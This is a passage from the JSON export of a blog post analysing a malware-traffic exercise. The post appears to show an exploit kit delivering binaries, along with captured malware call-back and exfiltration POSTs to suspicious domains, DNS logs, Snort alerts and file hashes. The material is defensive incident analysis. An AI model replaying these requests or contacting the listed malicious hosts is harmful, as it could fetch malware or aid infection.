keep-alive\r\n\t<\/pre>\n<p>And here is the site delivering the malicious binary files to the user&#8217;s system:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/literature.disco?audience=5Hr&amp;trip=&amp;election=txK1BgKFW&amp;piece=aRLmxzX&amp;normal=QGOT&amp;understand=IWOBe&amp;theory=so8bghs&amp;discover=y47E5&amp;tell=gSIQ&amp;opportunity=ZWe&amp;available=z HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept-Language: en-EN\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:27 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 660972\r\n\tConnection: keep-alive\r\n\r\n\t-----\r\n\r\n\tGET \/yes.wbxml?unite=tXu9a5tJI&amp;writer=J7y8dCR8F&amp;describe=LzQOS9&amp;for=&amp;note=C26Z8129ea&amp;number=gcsXv8v&amp;next=2unI-c8 HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept-Language: en-EN\r\n\tHost: neuhaus-hourakus.avelinoortiz.com\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.8.0\r\n\tDate: Tue, 24 Nov 2015 17:13:31 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 660972\r\n\tConnection: keep-alive\r\n\t<\/pre>\n<p>&#8211; Once the files have been downloaded from the above connection and installed, we see the malware trying to connect to two different IP addresses (52.22.18.194 \/ 52.21.140.191) on port 843. One thing that we can see is that the connection to these IP addresses are blocked since we only see the SYN packet being sent and no response from the other end:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img2.png\" alt=\"Calls to port 843 on remote system\" width=\"1280\" height=\"800\" class=\"aligncenter size-full wp-image-280\" \/><\/a><\/p>\n<p>Once again I am reminded of why it is a good idea to block any outbound connections except for well known ports (80\/443\/465\/995\/etc&#8230;) and having the logs for any\/all of that traffic. Granted one then needs to be able to ingest those logs and make sense of them as well. And don&#8217;t for get about your exceptions and having an exception process! <\/p>\n<p>And now for the call-backs from the malware that was deposited on the system:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/include\/class_dm_event.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 263\r\n\tHost: rnhbhnlmpvvdt.com\r\n\r\n\togis0=uq+2TOoO36\/E3djA7FAY+qOQp6njry09&amp;e=3HcbGddeYpGhIaiiCgDfit2Ka6pwf9z6U9SV&amp;oaqe=Yr7rA6V7flvNGrf\/TshfqMLu0k6Bvq3tSPELVxAJkdC65dMe&amp;oumkmm1=AmLf8T37jecJCNXacLepDLfFjH1UivyisxI5XCUaa2zjQ9meadjT8qdYm+fj&amp;y=nrOdI1OUNk+70KCnnMpGUpEo7syABmmqvaGuLIvDIq2fMn41gBBeaYeVvW0=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Tue, 24 Nov 2015 16:17:22 GMT\r\n\tServer: Apache\/2.2.20 (Ubuntu)\r\n\tX-Powered-By: PHP\/5.3.6-13ubuntu3.10\r\n\tX-Sinkhole: malware-sinkhole\r\n\tVary: Accept-Encoding\r\n\tContent-Length: 0\r\n\tKeep-Alive: timeout=1\r\n\tConnection: Keep-Alive\r\n\tContent-Type: text\/html\r\n\t<\/pre>\n<p>Interestingly enough, we can see a couple of POST requests being made to the server, but the response made from the server has the CONTENT-TYPE of &#8220;application\/octet-stream.&#8221; Since this is the response from the server, I do not believe that these are binary files at this time:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/include\/functions_newpost.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 277\r\n\tHost: ncqauqvqqhhzpc.com\r\n\r\n\tskgkmuq=2NKRclhTaaVcZfcfyHVUbhwfSld0Zju7&amp;ewueoc=PswwbVqsNwbSgcqfG6gImfag&amp;c=9JK1TVsiirO56TNCRSpf9LksdgM7&amp;msmui=lBJh+rlt3H8VdbhdKI0280o2&amp;y0=2qPbVGijLyJymtapuwZaLfNm7Kgmj5GtWigUmWGFfOqZ&amp;k=\/A+hPvXyhmaoXk\/ARfa6o\/7Q7OhyrnOoFe3+Ocq\/dvhHHXzRR3e\/&amp;mgacue=b\/1tQDvJswplB85kjSLVc4kED+uPy2U=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:16:42 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 587\r\n\tConnection: keep-alive\r\n\tSet-Cookie: PHPSESSID=9b6f301d3b6400079694d341333b6959; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: walkover=6258; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: rigidity=7597; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\tSet-Cookie: staunching=4382; expires=Wed, 25-Nov-2015 16:16:42 GMT\r\n\r\n\t-----\r\n\r\n\tPOST \/newthread.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/lnhxwmhoyjxqmtgn9u.com\/search.php\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 214\r\n\tHost: ncqauqvqqhhzpc.com\r\n\r\n\tmoycq=uskrE77T5r1UtuRf&amp;esuyuc=5EogXNdl7mULw6YgehMEBu4n&amp;eicww5=JN8vwWDSDeUquJeK&amp;my=QgXKqX\/MgvVEp\/o1IfmO&amp;we=sfFo65FUZ5QDgmswsUkkj2Fg&amp;wkmekkc=UZDILSO9ndxh\/s7z&amp;m=N\/0xqJ\/9awqYtpKpX6eb6939K4FBS4Qy0au\/Zwn3IbHiS9IQjG3yN7M=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:16:45 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 671932\r\n\tConnection: keep-alive\r\n\tSet-Cookie: PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: zebra=5401; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: spittle=7253; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: saffrons=3122; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: revisiting=3533; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: yogi=4911; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\r\n\t-----\r\n\r\n\tPOST \/blog_ajax.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/ncqauqvqqhhzpc.com\/newthread.php\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 996\r\n\tHost: ncqauqvqqhhzpc.com\r\n\tCookie: yogi=4911; revisiting=3533; saffrons=3122; spittle=7253; zebra=5401; PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51\r\n\r\n\tc1=gmxF3phTjC+8OFSGFNCdljAPS0FGt3OrKkO2rt71bkoTFgcUyJcx\/3Pm+fQoubED4QiA1EGXVmmKkLotN6lYw0rZ83NSrcQwLJmoJXa7pNalVstc&amp;wciqei=+Wh9WDa2CTJA6H07QIzW9BWR14ILJumro+UojZayYUYndmrStcwZqEanE6tnooX2bUl2lDl9Q0SiMMR6iOdPYGXmqKxntkC54efmn9ECKLWoykp0KoowkyeLRTHVc73xFPPbVGlrEmgjqXg\/Tu0RyFCKoJmJW699rsZ0NK9dtCPbpZCw3iIPVJMLiQXQ9uRs6TGHaYoiH78+D8fgAY0Aq1A3&amp;qeoqeeq=Q+fWoMnvsrmEM8iDyNIz7ccDVeRmhcoFeUrCD6+gnHYbXB748S6h0o7E2zxXxC3aH+PgDIesUKaAbT3TABkWNQFglVRXEeaIs4+4S4Wa\/2wODHbbgzofHqucgiqz4RJg&amp;oi=aMKP8Kk4nh8286Us7L\/9VTrztIDRNq\/I3jJJpkO+WD9DuVtYgWnaXtR1hiYFBE06Wy6wyjzSBDI9HqcKBYPoNlQ9PZ10hXbmJcNK1qnv+NlTAt51TEyBbQ4er0b2JF1lQK0WIhKGbwAFbmY7pqUMgPo5yV+b+nYcCh3pHU43&amp;mium5=4lH4p7o6NX+W0FxYJBt8L26UFaZ4sqGRyvg58sZZDUYn1eynh5+s3rpYOvlqWylYiqV7NzYiGPqN\/BeArceWuphTwo1aXyn+GTHoHi7CnLrfSnYmcqxEg3yjC4jlBCUAQirXOL0KccjnincV6uLUQELc&amp;moo=qf44CM+7QIwIOumHRqN59g8R4FzuCM0JLyITIC3+X16YW7egCD4z86y\/wZQUVUWhRArANwZdDj1ixy\/fHlSwEBN4RoBl\/L+iQSohJcSqNgLIfIOyopy7Bzqmr8zCcErpZYANscig7vbesHGijVmeuupkHodtFABMBc6Hj8+MfMCLNoHLDQY04qJf\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:17:08 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 37\r\n\tConnection: keep-alive\r\n\r\n\t.J..........|...4.+...+....3.g2M.....\r\n\t<\/pre>\n<p>We then see the last POST to a different server this time:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/news.php HTTP\/1.0\r\n\tHost: chin.truffleman.co.uk\r\n\tAccept: *\/*\r\n\tAccept-Encoding: identity, *;q=0\r\n\tAccept-Language: en-US\r\n\tContent-Length: 705\r\n\tContent-Type: application\/octet-stream\r\n\tConnection: close\r\n\tContent-Encoding: binary\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\r\n\t.\/6.P.@...(.....5^..?.=..o..}...4...p.:.....?.IF3r+E.i...P.&lt;.+.....5....mpz......wpB..I..h....O.sn..=..fX.+..n.U5...&quot;.....u..:&gt;JiS..1&amp;..5.&#x5B;v...B9...n.....?..y....&#x5B;...qO.7zafv..L$.,s.c..m.Db;.&quot;..+r.=......P.._...!3.jt........b.A....d%.Ck..PDj3*...,...N#`.RQ.....^.J. ..X.C.C..8.+bzh..j..=H4.e.....eW.~.).`.kP....w...H....4..`Ui!vai).\\.l...x.N....N.D.CA..z.K]:..........J.;...cQ...e..L^.^..}...R...0..G\\.+..x..#...6.i.Qf....6..-._t.........C.\\.!.z`l.-O.=.Vt..l.#...`.}q.r.?...2..,.....8.\r\n\t.z.....p...|K.?.0~9y.5g`.\/...U0....bA..p.7...l....r.&gt;B..vb......,L..&gt;.......*y^f...\r\n\t3&amp;K..]:5;.B.&quot;...q.z'.%.b..7..W..7.(.Sb.{}....A...d3..3.l2!......(Z...~......E....F.{k(k..I......&#x5B;2..........j`....Yn.d.m.....&lt;....-....\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Tue, 24 Nov 2015 16:16:57 GMT\r\n\tContent-Type: text\/html; charset=windows-1251\r\n\tConnection: close\r\n\r\n\t......L.&lt;a. }.&amp;...|.\r\n\t<\/pre>\n<p>One thing to mention as well, there were a fair good amount of DNS calls made that looked pretty abnormal. Please note that Chrome will do DNS pre-fetching which could cause some odd looking domains to be looked up as well (http:\/\/groups.google.com\/a\/chromium.org\/forum\/#!topic\/chromium-discuss\/F70-k_PGhEg). Here is a list of FQDNs that looked odd to me from the PCAP:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t11981 176.540744  10.1.25.119 63767 8.8.4.4      53 DNS  Standard query 0x2749  A jtikbwiyllxnyi61.com\r\n\t11983 176.819935      8.8.4.4 53 10.1.25.119  63767 DNS  Standard query response 0x2749 No such name\r\n\t11984 176.821924  10.1.25.119 60109 8.8.4.4      53 DNS  Standard query 0xc23c  A ghgmtcrluvghlwc91.com\r\n\t11988 176.915258      8.8.4.4 53 10.1.25.119  60109 DNS  Standard query response 0xc23c  A 127.0.1.1\r\n\t11989 176.926720  10.1.25.119 58168 8.8.4.4      53 DNS  Standard query 0x5cc3  A ghgmtcrluvghlwc91.com\r\n\t11990 177.005193      8.8.4.4 53 10.1.25.119  58168 DNS  Standard query response 0x5cc3  A 127.0.1.1\r\n\t11997 178.041367  10.1.25.119 57199 8.8.4.4      53 DNS  Standard query 0x043c  A qidxwsfqblej.com\r\n\t11998 178.171919      8.8.4.4 53 10.1.25.119  57199 DNS  Standard query response 0x043c No such name\r\n\t11999 178.173503  10.1.25.119 58882 8.8.4.4      53 DNS  Standard query 0xdad5  A lnhxwmhoyjxqmtgn9u.com\r\n\t12000 178.254598      8.8.4.4 53 10.1.25.119  58882 DNS  Standard query response 0xdad5  A 127.0.1.1\r\n\t12001 178.268719  10.1.25.119 52742 8.8.4.4      53 DNS  Standard query 0x1cf7  A lnhxwmhoyjxqmtgn9u.com\r\n\t12002 178.348164      8.8.4.4 53 10.1.25.119  52742 DNS  Standard query response 0x1cf7  A 127.0.1.1\r\n\t12040 179.351621  10.1.25.119 53261 8.8.4.4      53 DNS  Standard query 0xf345  A hsgxnjpdzifkjl4r.com\r\n\t12068 179.449632      8.8.4.4 53 10.1.25.119  53261 DNS  Standard query response 0xf345 No such name\r\n\t12073 179.452374  10.1.25.119 62977 8.8.4.4      53 DNS  Standard query 0x57eb  A xwhrskktvevezz0.com\r\n\t12112 179.540378      8.8.4.4 53 10.1.25.119  62977 DNS  Standard query response 0x57eb No such name\r\n\t12113 179.542265  10.1.25.119 50010 8.8.4.4      53 DNS  Standard query 0x2997  A rnhbhnlmpvvdt.com\r\n\t12158 179.651092      8.8.4.4 53 10.1.25.119  50010 DNS  Standard query response 0x2997  A 166.78.145.90\r\n\t12163 179.663157  10.1.25.119 50005 8.8.4.4      53 DNS  Standard query 0xb4c8  A rnhbhnlmpvvdt.com\r\n\t12194 179.748103      8.8.4.4 53 10.1.25.119  50005 DNS  Standard query response 0xb4c8  A 166.78.145.90\r\n\t12303 179.968038  10.1.25.119 61287 8.8.4.4      53 DNS  Standard query 0xb54b  A qtllebdadvitdim.com\r\n\t12334 180.059365      8.8.4.4 53 10.1.25.119  61287 DNS  Standard query response 0xb54b No such name\r\n\t12335 180.060984  10.1.25.119 56286 8.8.4.4      53 DNS  Standard query 0x9da2  A wyvpeiyaxycznuia6.com\r\n\t12372 180.155660      8.8.4.4 53 10.1.25.119  56286 DNS  Standard query response 0x9da2 No such name\r\n\t12373 180.157299  10.1.25.119 49396 8.8.4.4      53 DNS  Standard query 0xb029  A ncqauqvqqhhzpc.com\r\n\t12411 180.238941      8.8.4.4 53 10.1.25.119  49396 DNS  Standard query response 0xb029  A 95.211.205.229\r\n\t12415 180.252274  10.1.25.119 51862 8.8.4.4      53 DNS  Standard query 0x7ebc  A ncqauqvqqhhzpc.com\r\n\t12453 180.348244      8.8.4.4 53 10.1.25.119  51862 DNS  Standard query response 0x7ebc  A 95.211.205.229\r\n\t13636 193.071344  10.1.25.119 55508 8.8.4.4      53 DNS  Standard query 0x8551  A chin.truffleman.co.uk\r\n\t13637 193.272985      8.8.4.4 53 10.1.25.119  55508 DNS  Standard query response 0x8551  A 151.80.126.226\r\n\t<\/pre>\n<p>Results from Snort via Security Onion (ET rules):<br \/>\n=================================================<br \/>\n<a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img3.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img3.png\" alt=\"Results from Security Onion\" width=\"1177\" height=\"307\" class=\"aligncenter size-full wp-image-281\" \/><\/a><\/p>\n<p>VirusTotal links for links and files found:<br \/>\n===========================================<br \/>\nFile Name: neuhaus-who.olp.swf<br \/>\nMD5: e7540e851a7334a3ce068e772b205ece<br \/>\nSHA256: d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9<br \/>\nFirst submission: 2015-12-04 14:39:03 UTC<br \/>\nDetection ratio: 6 \/ 55<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9\/analysis\/1449239943\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9\/analysis\/1449239943\/<\/a><br \/>\nHybrid-Analysis link (Windows 7 x64): <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2<\/a><br \/>\nHybrid-Analysis link (Windows 7 x32): <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1<\/a><br \/>\nMalwr link: <a href=\"http:\/\/malwr.com\/analysis\/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM\/<\/a><\/p>\n<p>File Name: neuhaus-literature.disco.exe<br \/>\nMD5: 478294cf3367385f8715198fa27d0305<br \/>\nSHA256:  f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8<br \/>\nFirst submission: 2015-12-04 15:26:43 UTC<br \/>\nDetection ratio: 0 \/ 55<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/<\/a><\/p>\n<p>File Name: neuhaus-yes.wbxml.exe<br \/>\nMD5: e7540e851a7334a3ce068e772b205ece<br \/>\nSHA256:  f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8<br \/>\nFirst submission: 2015-12-04 14:39:03 UTC<br \/>\nDetection ratio: 0 \/ 55<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So this one has a great comical backstory &#8211; how the user (ironically from the SOC) Tom brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event &#8211; lol), there is one thing that I learned from this and it was from reading the answers. Brad explains how he went about finding the start of the infection chain from working backwards using&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=278\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-278","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=278"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/278\/revisions"}],"predecessor-version":[{"id":285,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/278\/revisions\/285"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}